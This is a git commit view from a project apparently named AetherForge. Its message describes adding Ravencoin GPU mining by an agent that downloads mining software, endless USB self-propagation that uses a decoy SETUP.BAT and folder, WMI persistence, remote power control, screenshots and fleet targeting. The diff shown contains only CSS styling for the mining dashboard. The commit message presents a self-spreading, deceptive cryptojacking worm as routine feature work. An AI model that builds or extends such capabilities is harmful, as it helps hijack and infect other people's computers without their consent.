Add RVN GPU mining, USB self-propagation chain, fleet power controls, and major dashboard features.

- Ravencoin GPU mining: agent auto-detects NVIDIA/AMD GPU, downloads T-Rex or TeamRedMiner, mines KawPoW; separate RVN stats section on dashboard with 3D-effect cards, GPU temperature/fan/power data; RVN pool presets and address field in Forge
- USB perpetual self-propagation: agent spreads to drives already plugged in at startup, refreshes stale payloads when binary size changes, 8s poll ticker, adds visible SETUP.BAT + decoy folder; chain is truly endless
- Fleet power controls: Reboot, Shutdown, and Wake-on-LAN buttons; agent reports MAC address; server stores MAC in DB; WOL endpoint sends UDP magic packet; WMI USB trigger persists across reboots
- Screenshots: agent captures desktop as JPEG, server buffers base64 frames, browser downloads instantly on command
- Fleet Groups: named and colour-coded groups of machines, selectable in Crucible for batch targeting
- Live terminal in Fleet Roster: auto-sysinfo on select, 5s live stats ticker, colour-coded logs, offline banner
- Crucible gold rain when single agent is active; matrix rain mystic word drops
- README fully rewritten; USB bundle repacked
This commit is contained in:
AetherForge
2026-06-02 21:50:34 -07:00
parent 41b5ec7a88
commit ca66f5d048
34 changed files with 2369 additions and 277 deletions

View File

@@ -1502,3 +1502,214 @@ button.deliverable-card .form-hint {
font-size: 0.78rem;
padding: 0.28rem 0.7rem;
}
/* ─── Mining Coin Labels (Monero / Ravencoin) ────────────────────────────── */
.mining-coin-label {
display: flex;
align-items: center;
gap: 0.65rem;
margin: 1.5rem 0 0.75rem;
padding: 0.5rem 1rem;
border-radius: 6px;
background: rgba(0,0,0,0.3);
border-left: 3px solid var(--neon-cyan);
}
.monero-label {
border-left-color: var(--neon-cyan);
}
.rvn-label {
border-left-color: #f5a623;
}
.coin-badge {
font-family: var(--font-tech);
font-size: 0.7rem;
padding: 0.15rem 0.5rem;
border-radius: 4px;
font-weight: 700;
letter-spacing: 0.1em;
}
.xmr-badge {
background: rgba(0, 255, 255, 0.15);
color: var(--neon-cyan);
border: 1px solid var(--neon-cyan);
}
.rvn-badge {
background: rgba(245, 166, 35, 0.15);
color: #f5a623;
border: 1px solid #f5a623;
}
.coin-name {
font-size: 0.9rem;
font-weight: 700;
letter-spacing: 0.15em;
color: #e0e0e0;
}
.coin-algo {
font-size: 0.75rem;
color: var(--text-muted);
letter-spacing: 0.05em;
}
.coin-hr {
margin-left: auto;
font-size: 1rem;
font-weight: 700;
color: var(--neon-cyan);
}
.rvn-label .coin-hr {
color: #f5a623;
}
/* ─── RVN Section ────────────────────────────────────────────────────────── */
.rvn-section {
margin-top: 0.5rem;
padding-top: 0.5rem;
border-top: 1px solid rgba(245, 166, 35, 0.2);
}
.rvn-hashrate {
color: #f5a623 !important;
text-shadow: 0 0 12px rgba(245, 166, 35, 0.6), 0 0 24px rgba(245, 166, 35, 0.3);
}
.rvn-gauges {
grid-template-columns: repeat(3, 1fr);
}
.rvn-stats-grid .rvn-stat-card {
background: linear-gradient(135deg, rgba(245, 166, 35, 0.06) 0%, rgba(0,0,0,0.0) 100%);
border: 1px solid rgba(245, 166, 35, 0.2);
text-align: center;
padding: 1.25rem !important;
position: relative;
overflow: hidden;
}
.rvn-stats-grid .rvn-stat-card::before {
content: '';
position: absolute;
inset: 0;
background: radial-gradient(ellipse at top, rgba(245,166,35,0.08) 0%, transparent 70%);
pointer-events: none;
}
.rvn-stats-grid .stat-label {
color: rgba(245, 166, 35, 0.7);
letter-spacing: 0.15em;
}
.neon-glow-gold {
color: #f5a623;
text-shadow: 0 0 8px rgba(245, 166, 35, 0.7), 0 0 16px rgba(245, 166, 35, 0.4);
}
/* ─── RVN Rig Detail Table ───────────────────────────────────────────────── */
.rvn-rig-table-card {
padding: 1.25rem !important;
background: rgba(245,166,35,0.03);
border: 1px solid rgba(245,166,35,0.15) !important;
}
.rvn-rig-table {
display: flex;
flex-direction: column;
gap: 0.6rem;
}
.rvn-rig-row {
display: grid;
grid-template-columns: 1fr 1.5fr 80px 1fr 42px 48px;
align-items: center;
gap: 0.5rem;
padding: 0.4rem 0.6rem;
border-radius: 4px;
background: rgba(0,0,0,0.25);
border-left: 2px solid rgba(245,166,35,0.35);
font-size: 0.82rem;
transition: background 0.15s;
}
.rvn-rig-row:hover {
background: rgba(245,166,35,0.07);
}
.rvn-rig-name {
font-size: 0.78rem;
color: #c0c0c0;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.rvn-rig-model {
color: var(--text-muted);
font-size: 0.72rem;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.rvn-rig-hr {
font-family: var(--font-tech);
font-size: 0.8rem;
font-weight: 600;
text-align: right;
}
.rvn-rig-bar-wrap {
height: 6px;
background: rgba(255,255,255,0.08);
border-radius: 3px;
overflow: hidden;
}
.rvn-rig-bar {
height: 100%;
background: linear-gradient(90deg, #f5a623, #ffcc55);
border-radius: 3px;
box-shadow: 0 0 6px rgba(245,166,35,0.5);
transition: width 0.6s ease;
}
.rvn-rig-pct {
font-family: var(--font-tech);
font-size: 0.7rem;
color: var(--text-muted);
text-align: right;
}
.rvn-rig-temp {
font-family: var(--font-tech);
font-size: 0.72rem;
color: var(--neon-cyan);
text-align: right;
}
.rvn-rig-temp.temp-hot {
color: var(--neon-amber);
text-shadow: 0 0 6px rgba(255,165,0,0.5);
}
/* RVN GPU section in the Forge */
.rvn-pool-picker .pool-preset-provider {
color: #f5a623 !important;
}
@media (max-width: 700px) {
.rvn-gauges {
grid-template-columns: repeat(2, 1fr);
}
.rvn-rig-row {
grid-template-columns: 1fr 80px 1fr 42px;
}
.rvn-rig-model,
.rvn-rig-pct { display: none; }
}